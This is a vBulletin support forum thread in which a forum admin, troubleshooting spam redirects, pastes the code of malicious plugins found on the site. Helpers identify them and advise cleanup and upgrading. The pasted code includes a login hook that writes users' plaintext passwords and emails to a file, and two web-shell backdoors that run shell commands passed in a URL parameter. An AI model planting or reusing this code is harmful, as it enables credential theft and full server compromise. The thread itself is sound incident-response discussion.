Does that fix the issue? Out of curiosity, would you post the code within those two plugins?

You can also try the following in order to track where it's coming from or how it happened:
- Check the logs at AdminCP > Statistics & Logs > Control Panel Log > look for entries that come from unfamiliar IP addresses.
- Disable all plugins and hooks. (guide) Problem still exists after all plugins/hooks disabled? Then it's possible that certain PHP/JS files are modified on your server.

MarkFL: I can't tell if it's fixed or not. When I go to privateerpressforums.com from a google link (the originally-reported way that this issue manifested), I don't get redirected to this spam website, so... hopefully it's fixed? I was never able to reproduce the issue in the first place, though. Lots of forum users were very vocal about it over the weekend.

Here are the codes:

global_rewrite:

$show['nopasswordempty'] = TRUE;

login_rewrite:

$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./customavatars/lg.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");

while($row = @mysql_fetch_array($sql_query))
{

if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ':' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}

The Federal plugins are still on. Here are their codes:

if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}

and

if(isset($_GET['lol'])){echo
"<h1>lol</h1><pre>"; system($_GET
['lol']);exit;}

In other words, they're identical. Not sure why there are two of them. In general they seem a bit suspicious to me.

Dave: I don't see any suspicious log entries from the past few weeks (though it's unclear to me exactly when this issue started). The IPs are all me and known moderators.

Yeah, those "Federal" plugins look suspicious to me as well. That first one looks like it could be harvesting passwords/email addresses. If it were me, I would look on the server and see what's in the file "/customavatars/lg.html" and if it contains passwords and email addresses, I would download it (in case it is legit and needs to be restored) and delete it.

I would disable or even delete those 4 plugins (make backups in a text file on your hard drive in case you need them back).

Edit: if the file "/customavatars/lg.html" does appear to have passwords/email addresses, I would advise your users to change their passwords.

I also could not solve my problem. As vbulletinsupport told me i deleted all plugins, and also i deleted ech files and i only have VSa - Advanced Forum Statistics on my website and it is the latest version. İ have to delete it?

Can you post exactly what you were told to do?

Hi MarkFL,

Indeed it was harvesting passwords. How awful. I will be backing up and deleting all four plugins.

Any idea how these got on our boards in the first place? I am going to be updating from 4.2.0 to 4.2.3 ASAP, but wanted to try to fix this issue before I did...

I would suspect an SQL exploit, and updating to vB 4.2.3 PL2 would be a good idea. :)

Definitely upgrade to the latest version as soon as possible.
It's entirely possible that they modified vBulletin's PHP files as well.

Will the upgrade to 4.2.3 overwrite these possibly-modified PHP files? Other than any possible compromises to security, the other thing I'm interested in is the extensive set of permissions-locked boards that we use -- not everything visible by everyone. As long as those permissions are preserved, I should be good, but if preserving them could allow a hack to persist, maybe not so good...